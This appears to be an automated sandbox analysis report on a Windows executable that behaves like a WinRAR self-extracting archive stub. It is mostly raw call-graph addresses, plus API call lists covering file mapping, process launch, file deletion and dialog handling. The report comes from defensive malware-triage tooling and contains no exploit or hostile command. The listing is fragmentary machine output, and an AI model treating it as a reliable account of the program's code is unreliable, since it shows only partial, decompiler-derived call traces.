calls 24983->24985 24990 bd3fa3 24984->24990 24988 bd1928 24985->24988 24988->24980 24994 bd3fac 24990->24994 24991 bd3b2d 101 API calls 24991->24994 24992 bd1966 24992->24988 24995 bd1e50 24992->24995 24994->24991 24994->24992 25007 be0e08 24994->25007 24996 bd1e5a __EH_prolog 24995->24996 25015 bd3bba 24996->25015 24998 bd1e84 24999 bd1732 78 API calls 24998->24999 25001 bd1f0b 24998->25001 25000 bd1e9b 24999->25000 25043 bd18a9 78 API calls 25000->25043 25001->24988 25003 bd1eb3 25005 bd1ebf _wcslen 25003->25005 25044 be1b84 MultiByteToWideChar 25003->25044 25045 bd18a9 78 API calls 25005->25045 25009 be0e0f 25007->25009 25008 be0e2a 25011 be0e3b SetThreadExecutionState 25008->25011 25014 bd6c31 RaiseException CallUnexpected 25008->25014 25009->25008 25013 bd6c31 RaiseException CallUnexpected 25009->25013 25011->24994 25013->25008 25014->25011 25016 bd3bc4 __EH_prolog 25015->25016 25017 bd3bda 25016->25017 25018 bd3bf6 25016->25018 25071 bd138b 74 API calls 25017->25071 25020 bd3e51 25018->25020 25023 bd3c22 25018->25023 25088 bd138b 74 API calls 25020->25088 25022 bd3be5 25022->24998 25023->25022 25046 be3377 25023->25046 25025 bd3ca3 25026 bd3d2e 25025->25026 25042 bd3c9a 25025->25042 25074 bdd051 25025->25074 25056 bdab1a 25026->25056 25027 bd3c9f 25027->25025 25073 bd20bd 78 API calls 25027->25073 25029 bd3c8f 25072 bd138b 74 API calls 25029->25072 25030 bd3c71 25030->25025 25030->25027 25030->25029 25032 bd3d41 25036 bd3dd7 25032->25036 25037 bd3dc7 25032->25037 25080 be3020 123 API calls 25036->25080 25060 bd9215 25037->25060 25040 bd3dd5 25040->25042 25081 bd2021 74 API calls 25040->25081 25082 be2297 25042->25082 25043->25003 25044->25005 25045->25001 25047 be338c 25046->25047 25049 be3396 ___std_exception_copy 25046->25049 25089 bd6ca7 75 API calls 25047->25089 25050 be34c6 25049->25050 25051 be341c 25049->25051 25055 be3440 _abort 25049->25055 25091 bf238d RaiseException 25050->25091 25090 be32aa 75 API calls 3 library calls 25051->25090 25054 be34f2 
25055->25030 25057 bdab28 25056->25057 25059 bdab32 25056->25059 25058 beeb38 8 API calls 25057->25058 25058->25059 25059->25032 25061 bd921f __EH_prolog 25060->25061 25092 bd7c64 25061->25092 25064 bd13ba 78 API calls 25065 bd9231 25064->25065 25095 bdd114 25065->25095 25067 bd928a 25067->25040 25068 bd9243 25068->25067 25070 bdd114 118 API calls 25068->25070 25104 bdd300 97 API calls __InternalCxxFrameHandler 25068->25104 25070->25068 25071->25022 25072->25042 25073->25025 25075 bdd084 25074->25075 25076 bdd072 25074->25076 25106 bd603a 82 API calls 25075->25106 25105 bd603a 82 API calls 25076->25105 25079 bdd07c 25079->25026 25080->25040 25081->25042 25083 be22a1 25082->25083 25084 be22ba 25083->25084 25087 be22ce 25083->25087 25107 be0eed 86 API calls 25084->25107 25086 be22c1 25086->25087 25088->25022 25089->25049 25090->25055 25091->25054 25093 bdb146 GetVersionExW 25092->25093 25094 bd7c69 25093->25094 25094->25064 25098 bdd12a __InternalCxxFrameHandler 25095->25098 25096 bdd29a 25097 bdd2ce 25096->25097 25099 bdd0cb 6 API calls 25096->25099 25100 be0e08 SetThreadExecutionState RaiseException 25097->25100 25098->25096 25101 bdd291 25098->25101 25102 be8c8d 103 API calls 25098->25102 25103 bdac05 91 API calls 25098->25103 25099->25097 25100->25101 25101->25068 25102->25098 25103->25098 25104->25068 25105->25079 25106->25079 25107->25086 25108->24827 25109->24827 25110->24823 25112 bd5d2a 25111->25112 25158 bd5c4b 25112->25158 25114 bd5d95 25114->24841 25116 bd5d5d 25116->25114 25163 bdb1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsFree 25116->25163 25118 bd8186 25117->25118 25119 bd8232 25118->25119 25170 bdbe5e 19 API calls __InternalCxxFrameHandler 25118->25170 25169 be1fac CharUpperW 25119->25169 25122 bd823b 25122->24844 25124 bd7c22 25123->25124 25125 bd7c5a 25124->25125 25171 bd6e7a 74 API calls 25124->25171 25125->24855 25127 bd7c52 25172 bd138b 74 API calls 25127->25172 25129->24908 25131 bd9db3 25130->25131 25134 bd9dc2 25130->25134 25132 bd9db9 
FlushFileBuffers 25131->25132 25131->25134 25132->25134 25133 bd9e3f SetFileTime 25133->24913 25134->25133 25135->24836 25136->24849 25137->24849 25138->24855 25139->24855 25140->24851 25141->24863 25142->24858 25143->24863 25145 bd98c5 GetFileType 25144->25145 25146 bd8b5a 25144->25146 25145->25146 25146->24878 25147 bd2021 74 API calls 25146->25147 25147->24876 25148->24878 25149->24881 25150->24904 25151->24904 25152->24904 25153->24904 25154->24904 25155->24909 25156->24916 25157->24860 25164 bd5b48 25158->25164 25161 bd5b48 2 API calls 25162 bd5c6c 25161->25162 25162->25116 25163->25116 25166 bd5b52 25164->25166 25165 bd5c3a 25165->25161 25165->25162 25166->25165 25168 bdb1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsFree 25166->25168 25168->25166 25169->25122 25170->25119 25171->25127 25172->25125 25177 bdcef2 25173->25177 25175 bdcf24 25176 bda99e 86 API calls 25175->25176 25178 bdcf2f 25176->25178 25179 bda99e 25177->25179 25180 bda9c1 25179->25180 25183 bda9d5 25179->25183 25184 be0eed 86 API calls 25180->25184 25182 bda9c8 25182->25183 25183->25175 25184->25182 25185->24924 25187 bda6a8 25186->25187 25188 bda727 FindNextFileW 25187->25188 25189 bda6c1 FindFirstFileW 25187->25189 25190 bda732 GetLastError 25188->25190 25196 bda709 25188->25196 25191 bda6d0 25189->25191 25189->25196 25190->25196 25192 bdbb03 GetCurrentDirectoryW 25191->25192 25193 bda6e0 25192->25193 25194 bda6fe GetLastError 25193->25194 25195 bda6e4 FindFirstFileW 25193->25195 25194->25196 25195->25194 25195->25196 25196->24776 25197->24578 25198->24586 25199->24586 25200->24589 25201->24597 25203 bd9f42 78 API calls 25202->25203 25204 bd1fe8 25203->25204 25205 bd1a04 101 API calls 25204->25205 25207 bd2005 25204->25207 25206 bd1ff5 25205->25206 25206->25207 25209 bd138b 74 API calls 25206->25209 25207->24605 25207->24606 25209->25207 25211 beb5bc GetDlgItem 25210->25211 25212 beb583 GetMessageW 25210->25212 25211->24616 25211->24617 25213 beb5a8 TranslateMessage DispatchMessageW 
25212->25213 25214 beb599 IsDialogMessageW 25212->25214 25213->25211 25214->25211 25214->25213 25328 be94e0 GetClientRect 25362 be21e0 26 API calls std::bad_exception::bad_exception 25379 bef2e0 46 API calls __RTC_Initialize 25380 bfbee0 GetCommandLineA GetCommandLineW 25329 c008a0 IsProcessorFeaturePresent 25381 bf0ada 51 API calls 2 library calls 25278 bd10d5 25283 bd5abd 25278->25283 25284 bd5ac7 __EH_prolog 25283->25284 25285 bdb505 84 API calls 25284->25285 25286 bd5ad3 25285->25286 25290 bd5cac GetCurrentProcess GetProcessAffinityMask 25286->25290 25291 bee2d7 25293 bee1db 25291->25293 25292 bee85d ___delayLoadHelper2@8 14 API calls 25292->25293 25293->25292 25330 bef4d3 20 API calls 25297 bee1d1 14 API calls ___delayLoadHelper2@8 25400 bfa3d0 21 API calls 2 library calls 25384 be62ca 123 API calls __InternalCxxFrameHandler 25305 bedec2 25306 bedecf 25305->25306 25307 bde617 53 API calls 25306->25307 25308 bededc 25307->25308 25309 bd4092 _swprintf 51 API calls 25308->25309 25310 bedef1 SetDlgItemTextW 25309->25310 25311 beb568 5 API calls 25310->25311 25312 bedf0e 25311->25312 25364 beb5c0 100 API calls 25402 be77c0 118 API calls 25403 beffc0 RaiseException _com_error::_com_error CallUnexpected 25404 c01f40 CloseHandle 25365 bef530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25407 beff30 LocalFree 24123 bfbb30 24124 bfbb42 24123->24124 24125 bfbb39 24123->24125 24127 bfba27 24125->24127 24128 bf97e5 _abort 38 API calls 24127->24128 24129 bfba34 24128->24129 24147 bfbb4e 24129->24147 24131 bfba3c 24156 bfb7bb 24131->24156 24134 bfba53 24134->24124 24137 bfba96 24140 bf8dcc _free 20 API calls 24137->24140 24140->24134 24141 bfba91 24180 bf91a8 20 API calls _abort 24141->24180 24143 bfbada 24143->24137 24181 bfb691 26 API calls 24143->24181 24144 bfbaae 24144->24143 24145 bf8dcc _free 20 API calls 24144->24145 24145->24143 24148 bfbb5a __FrameHandler3::FrameUnwindToState 24147->24148 24149 
bf97e5 _abort 38 API calls 24148->24149 24154 bfbb64 24149->24154 24151 bfbbe8 _abort 24151->24131 24154->24151 24155 bf8dcc _free 20 API calls 24154->24155 24182 bf8d24 38 API calls _abort 24154->24182 24183 bfac31 EnterCriticalSection 24154->24183 24184 bfbbdf LeaveCriticalSection _abort 24154->24184 24155->24154 24157 bf4636 __cftof 38 API calls 24156->24157 24158 bfb7cd 24157->24158 24159 bfb7ee 24158->24159 24160 bfb7dc GetOEMCP 24158->24160 24161 bfb805 24159->24161 24162 bfb7f3 GetACP 24159->24162 24160->24161 24161->24134 24163 bf8e06 24161->24163 24162->24161 24164 bf8e44 24163->24164 24169 bf8e14 _abort 24163->24169 24186 bf91a8 20 API calls _abort 24164->24186 24166 bf8e2f RtlAllocateHeap 24167 bf8e42 24166->24167 24166->24169 24167->24137 24170 bfbbf0 24167->24170 24169->24164 24169->24166 24185 bf7a5e 7 API calls 2 library calls 24169->24185 24171 bfb7bb 40 API calls 24170->24171 24172 bfbc0f 24171->24172 24175 bfbc60 IsValidCodePage 24172->24175 24177 bfbc16 24172->24177 24178 bfbc85 _abort 24172->24178 24173 befbbc _ValidateLocalCookies 5 API calls 24174 bfba89 24173->24174 24174->24141 24174->24144 24176 bfbc72 GetCPInfo 24175->24176 24175->24177 24176->24177 24176->24178 24177->24173 24187 bfb893 GetCPInfo 24178->24187 24180->24137 24181->24137 24183->24154 24184->24154 24185->24169 24186->24167 24193 bfb8cd 24187->24193 24196 bfb977 24187->24196 24189 befbbc _ValidateLocalCookies 5 API calls 24192 bfba23 24189->24192 24192->24177 24197 bfc988 24193->24197 24195 bfab78 __vsnwprintf_l 43 API calls 24195->24196 24196->24189 24198 bf4636 __cftof 38 API calls 24197->24198 24199 bfc9a8 MultiByteToWideChar 24198->24199 24201 bfc9e6 24199->24201 24208 bfca7e 24199->24208 24203 bf8e06 __vsnwprintf_l 21 API calls 24201->24203 24207 bfca07 _abort __vsnwprintf_l 24201->24207 24202 befbbc _ValidateLocalCookies 5 API calls 24204 bfb92e 24202->24204 24203->24207 24211 bfab78 24204->24211 24205 bfca78 24216 bfabc3 20 API calls _free 24205->24216 24207->24205 
24209 bfca4c MultiByteToWideChar 24207->24209 24208->24202 24209->24205 24210 bfca68 GetStringTypeW 24209->24210 24210->24205 24212 bf4636 __cftof 38 API calls 24211->24212 24213 bfab8b 24212->24213 24217 bfa95b 24213->24217 24216->24208 24221 bfa976 __vsnwprintf_l 24217->24221 24218 bfa99c MultiByteToWideChar 24219 bfa9c6 24218->24219 24220 bfab50 24218->24220 24224 bf8e06 __vsnwprintf_l 21 API calls 24219->24224 24227 bfa9e7 __vsnwprintf_l 24219->24227 24222 befbbc _ValidateLocalCookies 5 API calls 24220->24222 24221->24218 24223 bfab63 24222->24223 24223->24195 24224->24227 24225 bfaa9c 24253 bfabc3 20 API calls _free 24225->24253 24226 bfaa30 MultiByteToWideChar 24226->24225 24228 bfaa49 24226->24228 24227->24225 24227->24226 24244 bfaf6c 24228->24244 24232 bfaaab 24234 bf8e06 __vsnwprintf_l 21 API calls 24232->24234 24237 bfaacc __vsnwprintf_l 24232->24237 24233 bfaa73 24233->24225 24235 bfaf6c __vsnwprintf_l 11 API calls 24233->24235 24234->24237 24235->24225 24236 bfab41 24252 bfabc3 20 API calls _free 24236->24252 24237->24236 24238 bfaf6c __vsnwprintf_l 11 API calls 24237->24238 24240 bfab20 24238->24240 24240->24236 24241 bfab2f WideCharToMultiByte 24240->24241 24241->24236 24242 bfab6f 24241->24242 24254 bfabc3 20 API calls _free 24242->24254 24245 bfac98 _abort 5 API calls 24244->24245 24246 bfaf93 24245->24246 24249 bfaf9c 24246->24249 24255 bfaff4 10 API calls 3 library calls 24246->24255 24248 bfafdc LCMapStringW 24248->24249 24250 befbbc _ValidateLocalCookies 5 API calls 24249->24250 24251 bfaa60 24250->24251 24251->24225 24251->24232 24251->24233 24252->24225 24253->24220 24254->24225 24255->24248 25333 bfc030 GetProcessHeap 25366 bfb4ae 27 API calls _ValidateLocalCookies 25335 bd1025 29 API calls 25336 bff421 21 API calls __vsnwprintf_l 25385 bec220 93 API calls _swprintf 25410 bd1710 86 API calls 25368 bead10 73 API calls 25339 bea400 GdipDisposeImage GdipFree 25386 bed600 70 API calls 25340 bf6000 QueryPerformanceFrequency 
QueryPerformanceCounter 25371 bf2900 6 API calls 4 library calls 25387 bff200 51 API calls 25411 bfa700 21 API calls 24277 bd9f7a 24278 bd9f8f 24277->24278 24279 bd9f88 24277->24279 24280 bd9f9c GetStdHandle 24278->24280 24284 bd9fab 24278->24284 24280->24284 24281 bda003 WriteFile 24281->24284 24282 bd9fcf 24283 bd9fd4 WriteFile 24282->24283 24282->24284 24283->24282 24283->24284 24284->24279 24284->24281 24284->24282 24284->24283 24286 bda095 24284->24286 24288 bd6baa 78 API calls 24284->24288 24289 bd6e98 77 API calls 24286->24289 24288->24284 24289->24279 25343 bd1075 84 API calls 24291 bd9a74 24295 bd9a7e 24291->24295 24292 bd9b9d SetFilePointer 24293 bd9ab1 24292->24293 24294 bd9bb6 GetLastError 24292->24294 24294->24293 24295->24292 24295->24293 24297 bd9b79 24295->24297 24298 bd981a 24295->24298 24297->24292 24299 bd9833 24298->24299 24301 bd9e80 79 API calls 24299->24301 24300 bd9865 24300->24297 24301->24300 25344 bea070 10 API calls 25388 beb270 99 API calls 25413 bd1f72 128 API calls __EH_prolog 25414 bf7f6e 52 API calls 2 library calls 25346 bec793 107 API calls 4 library calls 25389 bf8268 55 API calls _free 25217 becd58 25218 bece22 25217->25218 25224 becd7b 25217->25224 25229 bec793 _wcslen _wcsrchr 25218->25229 25245 bed78f 25218->25245 25219 beb314 ExpandEnvironmentStringsW 25219->25229 25221 bed40a 25223 be1fbb CompareStringW 25223->25224 25224->25218 25224->25223 25225 beca67 SetWindowTextW 25225->25229 25228 bf3e3e 22 API calls 25228->25229 25229->25219 25229->25221 25229->25225 25229->25228 25231 bec855 SetFileAttributesW 25229->25231 25236 becc31 GetDlgItem SetWindowTextW SendMessageW 25229->25236 25239 becc71 SendMessageW 25229->25239 25244 be1fbb CompareStringW 25229->25244 25269 bea64d GetCurrentDirectoryW 25229->25269 25271 bda5d1 6 API calls 25229->25271 25272 bda55a FindClose 25229->25272 25273 beb48e 76 API calls 2 library calls 25229->25273 25233 bec90f GetFileAttributesW 25231->25233 25243 bec86f _abort _wcslen 25231->25243 
25233->25229 25235 bec921 DeleteFileW 25233->25235 25235->25229 25237 bec932 25235->25237 25236->25229 25238 bd4092 _swprintf 51 API calls 25237->25238 25240 bec952 GetFileAttributesW 25238->25240 25239->25229 25240->25237 25241 bec967 MoveFileW 25240->25241 25241->25229 25242 bec97f MoveFileExW 25241->25242 25242->25229 25243->25229 25243->25233 25270 bdb991 51 API calls 2 library calls 25243->25270 25244->25229 25247 bed799 _abort _wcslen 25245->25247 25246 bed9e7 25246->25229 25247->25246 25248 bed8a5 25247->25248 25249 bed9c0 25247->25249 25274 be1fbb CompareStringW 25247->25274 25251 bda231 3 API calls 25248->25251 25249->25246 25252 bed9de ShowWindow 25249->25252 25253 bed8ba 25251->25253 25252->25246 25254 bed8d9 ShellExecuteExW 25253->25254 25275 bdb6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 25253->25275 25254->25246 25261 bed8ec 25254->25261 25256 bed8d1 25256->25254 25257 bed925 25276 bedc3b 6 API calls 25257->25276 25258 bed97b CloseHandle 25259 bed994 25258->25259 25260 bed989 25258->25260 25259->25249 25277 be1fbb CompareStringW 25260->25277 25261->25257 25261->25258 25263 bed91b ShowWindow 25261->25263 25263->25257 25265 bed93d 25265->25258 25266 bed950 GetExitCodeProcess 25265->25266 25266->25258 25267 bed963 25266->25267 25267->25258 25269->25229 25270->25243 25271->25229 25272->25229 25273->25229 25274->25248 25275->25256 25276->25265 25277->25259 25348 bee455 14 API calls ___delayLoadHelper2@8 25295 bfc051 31 API calls _ValidateLocalCookies 25350 bea440 GdipCloneImage GdipAlloc 25391 bf3a40 5 API calls _ValidateLocalCookies

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00BE0863: GetModuleHandleW.KERNEL32(kernel32), ref: 00BE087C
                                                              • Part of subcall function 00BE0863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00BE088E
                                                              • Part of subcall function 00BE0863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00BE08BF
                                                              • Part of subcall function 00BEA64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00BEA655
                                                              • Part of subcall function 00BEAC16: OleInitialize.OLE32(00000000), ref: 00BEAC2F
                                                              • Part of subcall function 00BEAC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00BEAC66
                                                              • Part of subcall function 00BEAC16: SHGetMalloc.SHELL32(00C18438), ref: 00BEAC70
                                                            • GetCommandLineW.KERNEL32 ref: 00BEDF5C
                                                            • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00BEDF83
                                                            • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00BEDF94
                                                            • UnmapViewOfFile.KERNEL32(00000000), ref: 00BEDFCE
                                                              • Part of subcall function 00BEDBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00BEDBF4
                                                              • Part of subcall function 00BEDBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00BEDC30
                                                            • CloseHandle.KERNEL32(00000000), ref: 00BEDFD7
                                                            • GetModuleFileNameW.KERNEL32(00000000,00C2EC90,00000800), ref: 00BEDFF2
                                                            • SetEnvironmentVariableW.KERNEL32(sfxname,00C2EC90), ref: 00BEDFFE
                                                            • GetLocalTime.KERNEL32(?), ref: 00BEE009
                                                            • _swprintf.LIBCMT ref: 00BEE048
                                                            • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00BEE05A
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00BEE061
                                                            • LoadIconW.USER32(00000000,00000064), ref: 00BEE078
                                                            • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00BEE0C9
                                                            • Sleep.KERNEL32(?), ref: 00BEE0F7
                                                            • DeleteObject.GDI32 ref: 00BEE130
                                                            • DeleteObject.GDI32(?), ref: 00BEE140
                                                            • CloseHandle.KERNEL32 ref: 00BEE183
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                            • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                            • API String ID: 3049964643-3743209390

                                                            Control-flow Graph

                                                            APIs
                                                            • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00BEB73D,00000066), ref: 00BEA6D5
                                                            • SizeofResource.KERNEL32(00000000,?,?,?,00BEB73D,00000066), ref: 00BEA6EC
                                                            • LoadResource.KERNEL32(00000000,?,?,?,00BEB73D,00000066), ref: 00BEA703
                                                            • LockResource.KERNEL32(00000000,?,?,?,00BEB73D,00000066), ref: 00BEA712
                                                            • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00BEB73D,00000066), ref: 00BEA72D
                                                            • GlobalLock.KERNEL32(00000000), ref: 00BEA73E
                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00BEA762
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00BEA7C6
                                                              • Part of subcall function 00BEA626: GdipAlloc.GDIPLUS(00000010), ref: 00BEA62C
                                                            • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00BEA7A7
                                                            • GlobalFree.KERNEL32(00000000), ref: 00BEA7CD
                                                            Strings
                                                            Similarity
                                                            • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                            • String ID: PNG
                                                            • API String ID: 211097158-364855578

                                                            Control-flow Graph

                                                            APIs
                                                            • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00BDA592,000000FF,?,?), ref: 00BDA6C4
                                                              • Part of subcall function 00BDBB03: _wcslen.LIBCMT ref: 00BDBB27
                                                            • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00BDA592,000000FF,?,?), ref: 00BDA6F2
                                                            • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00BDA592,000000FF,?,?), ref: 00BDA6FE
                                                            • FindNextFileW.KERNEL32(?,?,?,?,?,?,00BDA592,000000FF,?,?), ref: 00BDA728
                                                            • GetLastError.KERNEL32(?,?,?,?,00BDA592,000000FF,?,?), ref: 00BDA734
                                                            Similarity
                                                            • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                            • String ID:
                                                            • API String ID: 42610566-0
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000000,?,00BF7DC4,00000000,00C0C300,0000000C,00BF7F1B,00000000,00000002,00000000), ref: 00BF7E0F
                                                            • TerminateProcess.KERNEL32(00000000,?,00BF7DC4,00000000,00C0C300,0000000C,00BF7F1B,00000000,00000002,00000000), ref: 00BF7E16
                                                            • ExitProcess.KERNEL32 ref: 00BF7E28
                                                            Similarity
                                                            • API ID: Process$CurrentExitTerminate
                                                            • String ID:
                                                            • API String ID: 1703294689-0
                                                            APIs
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00BEB7E5
                                                              • Part of subcall function 00BD1316: GetDlgItem.USER32(00000000,00003021), ref: 00BD135A
                                                              • Part of subcall function 00BD1316: SetWindowTextW.USER32(00000000,00C035F4), ref: 00BD1370
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00BEB8D1
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BEB8EF
                                                            • IsDialogMessageW.USER32(?,?), ref: 00BEB902
                                                            • TranslateMessage.USER32(?), ref: 00BEB910
                                                            • DispatchMessageW.USER32(?), ref: 00BEB91A
                                                            • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00BEB93D
                                                            • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00BEB960
                                                            • GetDlgItem.USER32(?,00000068), ref: 00BEB983
                                                            • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00BEB99E
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,00C035F4), ref: 00BEB9B1
                                                              • Part of subcall function 00BED453: _wcslen.LIBCMT ref: 00BED47D
                                                            • SetFocus.USER32(00000000), ref: 00BEB9B8
                                                            • _swprintf.LIBCMT ref: 00BEBA24
                                                              • Part of subcall function 00BD4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BD40A5
                                                              • Part of subcall function 00BED4D4: GetDlgItem.USER32(00000068,00C2FCB8), ref: 00BED4E8
                                                              • Part of subcall function 00BED4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00BEAF07,00000001,?,?,00BEB7B9,00C0506C,00C2FCB8,00C2FCB8,00001000,00000000,00000000), ref: 00BED510
                                                              • Part of subcall function 00BED4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00BED51B
                                                              • Part of subcall function 00BED4D4: SendMessageW.USER32(00000000,000000C2,00000000,00C035F4), ref: 00BED529
                                                              • Part of subcall function 00BED4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00BED53F
                                                              • Part of subcall function 00BED4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00BED559
                                                              • Part of subcall function 00BED4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00BED59D
                                                              • Part of subcall function 00BED4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00BED5AB
                                                              • Part of subcall function 00BED4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00BED5BA
                                                              • Part of subcall function 00BED4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00BED5E1
                                                              • Part of subcall function 00BED4D4: SendMessageW.USER32(00000000,000000C2,00000000,00C043F4), ref: 00BED5F0
                                                            • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00BEBA68
                                                            • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00BEBA90
                                                            • GetTickCount.KERNEL32 ref: 00BEBAAE
                                                            • _swprintf.LIBCMT ref: 00BEBAC2
                                                            • GetLastError.KERNEL32(?,00000011), ref: 00BEBAF4
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00BEBB43
                                                            • _swprintf.LIBCMT ref: 00BEBB7C
                                                            • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00BEBBD0
                                                            • GetCommandLineW.KERNEL32 ref: 00BEBBEA
                                                            • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00BEBC47
                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 00BEBC6F
                                                            • Sleep.KERNEL32(00000064), ref: 00BEBCB9
                                                            • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00BEBCE2
                                                            • CloseHandle.KERNEL32(00000000), ref: 00BEBCEB
                                                            • _swprintf.LIBCMT ref: 00BEBD1E
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00BEBD7D
                                                            • SetDlgItemTextW.USER32(?,00000065,00C035F4), ref: 00BEBD94
                                                            • GetDlgItem.USER32(?,00000065), ref: 00BEBD9D
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00BEBDAC
                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00BEBDBB
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00BEBE68
                                                            • _wcslen.LIBCMT ref: 00BEBEBE
                                                            • _swprintf.LIBCMT ref: 00BEBEE8
                                                            • SendMessageW.USER32(?,00000080,00000001,?), ref: 00BEBF32
                                                            • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00BEBF4C
                                                            • GetDlgItem.USER32(?,00000068), ref: 00BEBF55
                                                            • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00BEBF6B
                                                            • GetDlgItem.USER32(?,00000066), ref: 00BEBF85
                                                            • SetWindowTextW.USER32(00000000,00C1A472), ref: 00BEBFA7
                                                            • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00BEC007
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00BEC01A
                                                            • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00BEC0BD
                                                            • EnableWindow.USER32(00000000,00000000), ref: 00BEC197
                                                            • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00BEC1D9
                                                              • Part of subcall function 00BEC73F: __EH_prolog.LIBCMT ref: 00BEC744
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00BEC1FD
                                                            Strings
                                                            Similarity
                                                            • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
                                                            • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                            • API String ID: 3445078344-2238251102

                                                            Control-flow Graph

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32), ref: 00BE087C
                                                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00BE088E
                                                            • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00BE08BF
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00BE0B69
